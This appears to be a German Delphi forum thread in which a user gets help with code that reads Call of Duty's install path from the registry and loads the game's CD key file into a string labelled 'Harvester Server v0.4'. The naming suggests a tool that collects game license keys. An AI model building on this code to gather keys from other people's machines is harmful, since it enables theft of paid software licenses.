![]() |
Re: Probleme beim String einlesen und übergeben
Häng es mal im Posting an.
|
das würde ich nur sehr ungerne machen ....komm jetzt gib dir nen ruck....was soll ist nur eine handbewegung für dich ... bitte !
|
Dann als Anhang an eine PN. Und hör endlich auf hier öffentlich weghen ICQ zu nerven, ich hatte meine Gründe. Punkt.
|
Delphi-Quellcode:
Mach mal die Augen auf und kuck dir die Ausgabe mal genau.
while not EOF(F) do
begin ReadLn(F, s); CoD := s; writeln(s) // <--- was ist das?!?!? end; CloseFile(F); writeln(cod); // <-- und was ist das?!?! |
das beides war nur für mich zum sehen was er ausgibt !
setz mal beides auf //...dann siehst du das es file not found ist und nicht cod + outro.... verstehst du ? |
Delphi-Quellcode:
So zeigt er mir nur die letzte zeile in der Datei an mit deinem Outro, wie es aich sein soll.
procedure GetKeys;
var s: string; Outro: string; f: textfile; CoD: string; // 21 begin try s := 'c:\boot.ini'; GetValueFromReg(HKLM, 'SOFTWARE\Activision\Call of Duty\', 'InstallPath'); if s <> '' then begin KeyPath := s; // + '\main\codkey'; AssignFile(F, KeyPath); Reset(F); while not EOF(F) do begin ReadLn(F, s); CoD := s; // writeln(s) end; CloseFile(F); //writeln(cod); end; Outro := 'Harvester Server v0.4 (c) AGM65 Maverick - [url]www.rnsys.de[/url] -'; ALLGAMES := CoD; if allgames <> '' then ALLGAMES := CoD + Outro; if allgames = '' then ALLGAMES := 'No CD Keys found! Harvester Server v0.4 (c) AGM65 Maverick - [url]www.rnsys.de[/url] -'; writeln(ALLGAMES); // Text ausgeben readln; // noch ne zeile lesen, damit das fenster nicht sofort wieder zugeht! except //showmessage('mach nix') end; end; |
also wenn der source so ist:
Code:
dann öffnet er die ganze key file und übergibt nicht den string( erste zeile aus der key file) an den string "cod"...
s := GetValueFromReg(HKLM,'SOFTWARE\Activision\Call of Duty\', 'InstallPath');
if s <> '' then begin KeyPath := s + '\main\codkey'; AssignFile(F, KeyPath); Reset(F); while not EOF(F) do begin ReadLn(F, s); CoD := s; //writeln(s) end; CloseFile(F); //writeln(cod); end; |
Ich habe irgendeine Textdatei genommen, welche ist doch egal.
|
ja komisch mit deine text datei (also der bootlog geht es wunderbar ..wieso mit der codkey nicht? villeicht wegrn der endung ?
luckie, du hast recht ...verdammte scheiße es lag an der text file....NEIN ICH DREH AB !! ALL DIE STUNDEN ....danke für deine zeit......man man man jetzt geht alles wunderbar so wies soll ! hab dank ! |
nein es geht wieder nicht argh .. er macht alles aus der text file mit rein :( !
nicht alles .....nur ab der 2ten zeile...ich könnte heulen ! |
Alle Zeitangaben in WEZ +1. Es ist jetzt 19:58 Uhr. |